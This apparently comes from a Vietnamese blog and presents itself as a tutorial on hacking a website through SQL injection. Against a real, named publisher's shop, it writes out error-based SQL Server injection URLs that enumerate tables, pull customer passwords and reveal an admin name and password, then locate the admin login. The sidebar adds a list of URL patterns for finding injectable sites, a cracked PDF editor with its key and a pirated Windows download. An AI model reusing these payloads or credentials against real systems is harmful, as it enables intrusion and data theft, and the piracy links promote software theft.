Chuyển đến nội dung chính

TUT Hack web lỗi sql chi tiết

Ngồi learn get root oải quá lang thang tự nhiên lòi ra thằng này . Nhìn nó nghi nghi thế là check SQL thử - Hi.c cái này bình thường ko có gì bà con đừng có chửi nha
Code:
http://www.nxbctqg.org.vn/SCart/ShoppingCart.asp?option=add&Id=1074'
thêm đại dấu ' vô . he biết ngay mà nhìn đã thấy nghi rồi
Code:
   
Microsoft OLE DB Provider for SQL Server error '80040e14'

Unclosed quotation mark before the character string ''.

/SCart/cart.asp, line 76
Hí làm gì giờ nhỉ thử lấy column xem nào ^.^
Code:
http://www.nxbctqg.org.vn/SCart/ShoppingCart.asp?option=add&Id=1074%20and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.columns%20where%20table_name%20not%20in%20(%20'')))--sp_password
được gì thế này
Code:
Microsoft OLE DB Provider for SQL Server error '80040e07'

Syntax error converting the nvarchar value 'Address' to a column of data type int.

/SCart/cart.asp, line 76
thế là lòi ra rồi he he . tiếp tục query ta được một đống sau
Code:
http://www.nxbctqg.org.vn/SCart/ShoppingCart.asp?option=add&Id=1074%20and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.columns%20where%20table_name%20not%20in%20(%20'Address','AlsoPurchased','Authors','BEGInventory','BEGPayables','BEGReceivables','BEGReceivables','Books','Categories','Contacts','Customers','DiscountRate','NewsTopics','NewsSources','Orders','PayablesTrack','PaymentType','ReceivablesTrack','SachDBchuaTG','SachDBcoTG','Sales','Search','Session','Settings','Stores','sysconstraints','syssegments','TaxRate','Test','dtproperties','Employees','Inventory','InventoryDetails','InventoryTrack','ItemAuthor','ItemAuthorKeyword','ItemCategory','Items','ItemSubjectKeyword','ItemSubjectKeyword','ItemTitleKeyword','ItemType','ItemWineryKeyword','Keywords','News','TheLoaiSach','TransactionDetails','vwAccounts','Wineries','Wines')))--sp_password
Nhìn cái vwAccounts thấy nghi nghi nhưng hok có pass admin T.T Hóa ra nó nằm ở Customers
Code:
http://www.nxbctqg.org.vn/SCart/ShoppingCart.asp?option=add&Id=1074%20and%201=convert(int,(select%20top%201%20column_name%20from%20information_schema.columns%20where%20table_name='customers'%20AND%20column_name%20not%20in%20('PKId','Alias','Password','CustomerName','AddressId','Email','LastSale','TotalSaleYTD','Balance','Category','CreditRating','CreditLimit')))--sp_password
Cứ từ từ mà soi là ta lại được những table kia ^.^ Customname kìa hihi Password kìa ^.^
thế mà làm mình soi cái này mới ức chứ
Code:
http://www.nxbctqg.org.vn/SCart/ShoppingCart.asp?option=add&Id=1074%20and%201=convert(int,(select%20top%201%20column_name%20from%20information_schema.columns%20where%20table_name='Orders'%20AND%20column_name%20not%20in%20('PKId','CustomerId','EmployeeId','OtherStoreId','StoreId','SupplierId','OrderType','OrderStatus','OrderDate','PickupDate','ShippingHandling','ShipToName',%20'ShipToAddressId')))--sp_password
hè hè bây giờ ta lấy password thôi
Code:
http://www.nxbctqg.org.vn/SCart/ShoppingCart.asp?option=add&Id=1074%2%convert(int,(select  top 1 CustomerName%2b'/'%2bPassword from Customers))--sp_password
Hè hè ra Đào Ngọc Đạt/NgocDat là name và pass của admin >Sướng nhá . Nhưng mà vẫn chưa thấy link login đâu cả . Lười check thôi thì đoán vậy
login không phải , thử nguoiquantri không phải . Khôpng biết Admin có để link login vô ko nhỉ . Đang chán thế nào tay lại đánh thêm vào url dòng admin thế là nó lòi ngay ra . Hic kể ra cũng có lúc ngu thật
Code:
http://www.nxbctqg.org.vn/admin
Ô nhưng sao thế này nó đòi ID để login T.T Thử đại cái usename Đào Ngọc Đạt không được hehe lại phải đi soi típ rùi . Nhưng mà đói rùi anh em vô check nha thế mới vui ^.^ Đi ăn cơm cái đã . Chú ý mấy cái table có ID đằng sau anh em nha .
The end : Đã báo admin . Không phá hoại gì . Lạy chúa tha tội con thờ Phật cơ T.T


Nhận xét

Bài đăng phổ biến từ blog này

Free 2000 Drok Tìm Kiếm Website lỗi SQLi

index.php?id= trainers.php?id= buy.php?category= article.php?ID= play_old.php?id= declaration_more.php?decl_id= pageid= games.php?id= page.php?file= newsDetail.php?id= gallery.php?id= show.php?id= staff_id= newsitem.php?num= readnews.php?id= top10.php?cat= historialeer.php?num= reagir.php?num= Stray-Questions-View.php?num= forum_bds.php?num= game.php?id= view_product.php?id= newsone.php?id= sw_comment.php?id= news.php?id= avd_start.php?avd= event.php?id= product-item.php?id= sql.php?id= news_view.php?id= select_biblio.php?id= humor.php?id= aboutbook.php?id= ogl_inet.php?ogl_id= fiche_spectacle.php?id= communique_detail.php?id= sem.php3?id= kategorie.php4?id= faq2.php?id= show_an.php?id= preview.php?id= loadpsb.php?id= opinions.php?id= spr.php?id= pages.php?id= announce.php?id= clanek.php4?id= participant.php?id= download.php?id= main.php?id= review.php?id= chappies.php?id= read.php?id= prod_detail.php?id= viewphoto.php?id= person.php?id= productinfo.php?id= showimg.php?id= view.php?id=...

Foxit Phantom 2.2.4.0225 full key- đọc, chỉnh sửa và in file PDF

Foxit Phantom là phần mềm cực nhẹ, cực chuyên nghiệp trong việc đọc, chỉnh sửa và in file PDF. Bạn có thể tùy chỉnh mọi thứ trong file PDF giống như word vậy. Mình sẽ share với các bạn bản cài đặt mới nhất 2.2.4.0225 và đặc biệt là có file key cho các bạn dùng, các bạn ko phải lo đến vấn đề tìm crack nữa. Link download :  http://www.mediafire.com/?6u2vnjvfcsvorca  https://drive.google.com/file/d/1ZLtZ1Uqd9Z4oU-LCVcbGMITTEnw_W-kH/view?usp=sharing https://www.fshare.vn/file/T9JNEO1QDDH1

Windows 7 (32 & 64 Bit) Ultimate Lite- Nhanh, Mượt, Nhẹ by Ivankehayov - Rebuild by Lehait [GHO, TIB, ISO]

Nếu đã dùng qua ghost của mình chắc các bạn đã biết đến bản Win 7 Lite Autumn. Hôm nay mình sẽ giới thiệu đến các bạn bộ Win 7 Lite gốc mà mình dùng để làm bản Lite Autumn đó. Mặc dù đã lâu rồi nhưng mình test vẫn không bản nào hơn bản này nên hôm nay quyết định rebuild tối ưu thêm và chia sẻ với các bạn. Rebuild từ bộ Windows 7 Lite của Ivankehayov đã lược bỏ những thành phần không cần thiết. Tối ưu service, registry,.... để windows chạy mượt hơn. Đây là dạng windows setup nên sẽ không kèm bất cứ thành phần nào Không @ctive windows, các bạn dùng Mã hoặc tải tool @ctive tại đây Đây là bản windows lite nên các bạn hãy chuẩn bị driver hoặc bộ driver trước khi cài đặt DOWNLOAD GHO X86 :  https://www.fshare.vn/file/2DCCGWWJPP7I    or Link tốc độ cao GHO X64 :  http://www.fshare.vn/file/T2J8AH9IL5NL  or Link tốc độ cao ISO X86: h ttps://www.fshare.vn/file/EDDJAJJVHHQY ISO  X64:  https://www.fshare.vn/file/YQKAH8HHNJIM TIB:...